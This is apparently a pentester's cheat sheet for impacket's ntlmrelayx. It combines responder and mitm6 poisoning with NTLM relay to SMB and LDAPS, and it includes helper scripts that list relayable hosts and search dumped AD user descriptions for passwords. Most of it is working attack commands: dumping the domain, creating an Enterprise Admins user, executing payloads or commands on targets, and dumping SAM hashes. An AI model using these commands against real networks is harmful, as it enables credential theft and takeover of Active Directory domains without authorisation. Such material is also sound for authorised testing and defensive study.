ntlmrelayx

  • NTLM relay attacks within windows AD: takes an incoming NTLM authentication (captured e.g. with responder or mitm6) and relays it to another host (SMB, LDAP/LDAPS, HTTP, MSSQL, ...) instead of cracking the hash
  • only works against targets that do not require signing (SMB signing, LDAP signing / channel binding)

installation

  • part of impacket (examples/ntlmrelayx.py); the kali/debian package puts it in /usr/share/doc/python3-impacket/examples/, newer packages also install it as ntlmrelayx.py in PATH

usage

relay NTLM authentication

with responder

# targets.txt: one target per line, e.g. smb://192.168.122.40 (only hosts that do not require SMB signing)
$ sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf ~/targets.txt -smb2support
 
# set HTTP = Off and SMB = Off in /etc/responder/Responder.conf, so responder does not bind 80/445
# and ntlmrelayx can listen there instead; responder still poisons LLMNR/NBT-NS/mDNS
$ responder -I eth1 -w -d 
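building ~/targets.txt (added example, not part of impacket or responder): only hosts that do not require SMB signing are relayable, so the script below filters the output of nmap's smb2-security-mode script down to those hosts and prints them in ntlmrelayx target syntax. The nmap output embedded in it is a constructed sample, and the function names are mine.

```shell
#!/usr/bin/env bash
# Added example, not part of impacket/responder: build the ntlmrelayx target
# list from "nmap -p445 --script smb2-security-mode" output. Relaying SMB
# authentication to a host that requires signing fails, so only hosts that
# report "Message signing enabled but not required" are worth listing.

# Constructed sample of nmap normal output (-oN); the format is assumed.
SAMPLE_NMAP_OUTPUT='Nmap scan report for dc01.mavel.local (192.168.122.33)
Host is up (0.00030s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 192.168.122.40
Host is up (0.00050s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 192.168.122.41
Host is up (0.00040s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required

Nmap scan report for 192.168.122.50
Host is up (0.00060s latency).
PORT    STATE SERVICE
445/tcp closed microsoft-ds'

# relay_targets: nmap normal output on stdin -> one "smb://<ip>" line per
# relayable host on stdout. The address is taken from the "Nmap scan report"
# line (the part in parentheses when nmap printed a hostname).
relay_targets() {
    awk '
        /^Nmap scan report for / {
            host = $NF
            sub(/^\(/, "", host); sub(/\)$/, "", host)
        }
        /Message signing enabled but not required/ {
            if (host != "") { print "smb://" host; host = "" }
        }
    '
}

# count_targets: number of relayable hosts in the nmap output on stdin
count_targets() {
    relay_targets | wc -l | tr -d ' '
}

# Stand-alone demo on the constructed sample (prints .40 and .41, not the DC).
printf '%s\n' "$SAMPLE_NMAP_OUTPUT" | relay_targets
```

real run: nmap -p445 --script smb2-security-mode -oN smb_signing.nmap 192.168.122.0/24, then relay_targets < smb_signing.nmap > ~/targets.txt. crackmapexec does the same in one step with crackmapexec smb 192.168.122.0/24 --gen-relay-list targets.txt. Domain controllers require SMB signing by default, which is why the DC is filtered out above and why relaying to the DC is done over LDAPS instead.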

with mitm6

$ sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -6 -tf ~/targets.txt -smb2support
 
# relay to LDAPS on the DC: by default ntlmrelayx dumps the domain (ldapdomaindump) into the loot dir (-l);
# if the relayed user is privileged enough it also creates a new user and adds it to a privileged group (Enterprise Admins)
# 192.168.122.33 : DC
# -6: also listen on IPv6; -wh: hostname in the WPAD file ntlmrelayx serves (mitm6 makes it resolve to the attacker via DNS)
$ sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -6 -t ldaps://192.168.122.33 -wh fakewpad.mavel.local -l lootme
 
$ sudo mitm6 -d <ad domain name>
  • ldap dump: look in the loot dir (domain_users.grep/.html/.json, domain_computers.*, domain_groups.*, ...); check the description field of extracted user data for passwords
  • if an admin user logs in, ntlmrelayx creates a new user and adds it to a privileged group (Enterprise Admins); username and password are printed in the ntlmrelayx log
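checking the description field (added example, not part of impacket or ldapdomaindump): the script below searches a domain_users.grep from the loot dir for descriptions that look like they hold credentials. It assumes the file is tab-separated with a header row of attribute names, as ldapdomaindump writes it, and locates the columns by name so the real file's extra columns do not matter. The sample data embedded in it is constructed and the function names are mine.

```shell
#!/usr/bin/env bash
# Added example, not part of impacket: search the domain_users.grep that the
# ldap dump leaves in the loot dir (-l) for descriptions that look like
# credentials. Assumed: tab-separated file with a header row of attribute
# names, as ldapdomaindump writes it; columns are looked up by name.

# sample_users_grep: constructed sample in that format (fewer columns than the
# real dump; all data is made up).
sample_users_grep() {
    printf 'cn\tsAMAccountName\tmemberOf\tuserAccountControl\tdescription\n'
    printf 'Administrator\tAdministrator\tCN=Domain Admins,CN=Users,DC=mavel,DC=local\t512\tBuilt-in account for administering the computer/domain\n'
    printf 'svc_backup\tsvc_backup\t\t66048\tBackup service. Password: Summer2021!\n'
    printf 'John Doe\tjdoe\t\t512\t\n'
    printf 'Helpdesk\thelpdesk\t\t512\ttemp pwd Welcome1 until reset\n'
}

# flag_descriptions: grep file on stdin -> "sAMAccountName<TAB>description"
# for every row whose description mentions pass/pwd/cred/secret
# (case-insensitive). Exits 2 if the header lacks the needed columns.
flag_descriptions() {
    awk '
        BEGIN { FS = "\t"; OFS = "\t" }
        NR == 1 {
            for (i = 1; i <= NF; i++) col[tolower($i)] = i
            name = col["samaccountname"]; desc = col["description"]
            if (!name || !desc) {
                print "no sAMAccountName/description column in header" > "/dev/stderr"
                exit 2
            }
            next
        }
        $desc != "" && tolower($desc) ~ /pass|pwd|cred|secret/ { print $name, $desc }
    '
}

# Stand-alone demo on the constructed sample (prints svc_backup and helpdesk).
sample_users_grep | flag_descriptions
```

real run: flag_descriptions < lootme/domain_users.grep. The same function works on domain_computers.grep, whose header also has a description column. Widen the pattern to taste; the point is that the column is found by name rather than by position.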

different modes

# interactive mode: ntlmrelayx opens a local SMB client shell per relayed session
# (address printed in the log, 127.0.0.1:11000 and up); connect with nc 127.0.0.1 11000
$ ntlmrelayx.py -tf targets.txt -smb2support -i
 
# execute a file on the target (e.g., meterpreter payload); the relayed user must be local admin on the target
$ ntlmrelayx.py -tf targets.txt -smb2support -e some.exe
 
# execute a command on the target (same local admin requirement); output is printed in the ntlmrelayx log
$ ntlmrelayx.py -tf targets.txt -smb2support -c "cmd"
 
# default (no -i/-e/-c) when relaying to smb: dump the local SAM hashes of the target